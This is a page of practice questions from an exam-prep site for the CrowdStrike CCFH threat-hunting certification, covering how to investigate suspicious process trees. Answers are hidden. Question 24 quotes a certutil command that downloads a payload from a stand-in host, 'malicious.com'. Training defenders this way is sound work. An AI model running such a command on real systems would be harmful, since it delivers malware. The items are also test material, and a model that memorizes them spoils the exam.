Examers.io
ExamsOrganizationsHow it worksPricingHelp & FAQ
CrowdStrike logo

CrowdStrikeCertified Falcon Hunter (CCFH)

Domain 7Objective 5

7.5 Investigate a Process Tree CCFH Practice Questions (Page 5)

Part of the Hunting Methodology domain, which makes up ~17% of our current practice bank.

24questions here
5free pages
4concepts

Questions 21–24

  1. 21expert · hard

    During a hunt, you find a process tree where 'svchost.exe' is the parent of 'regsvr32.exe', which then spawned 'rundll32.exe'. The command line for regsvr32.exe includes a URL to an external site. The host is a domain controller with no internet access except through a proxy. Which action is most appropriate?

    Select an answer first
  2. 22foundation · easy

    Which of the following command-line arguments would be considered suspicious when seen in a process tree?

    Select an answer first
  3. 23application · medium

    In a process tree, you see that 'lsass.exe' is the parent of a process named 'cmd.exe'. This is highly unusual because lsass.exe is a system process that should not spawn child processes. What does this parent-child relationship most likely indicate?

    Select an answer first
  4. 24application · medium

    You are analyzing a process tree where 'explorer.exe' is the parent of 'wscript.exe', which then spawned 'cmd.exe' with the command line 'cmd.exe /c certutil -urlcache -split -f http://malicious.com/payload.exe C:\Users\Public\payload.exe'. What is the most effective way to determine if this is malicious?

    Select an answer first
Finished these 4 questions?

Review the revealed explanations, or continue through the curriculum.

No more pagesBack to CCFH

Free Basic Practice is a study aid with revealable answers — not a scored exam. Examers.io is independent and not affiliated with or endorsed by CrowdStrike. “CCFH” is a trademark of its owner, used for identification only.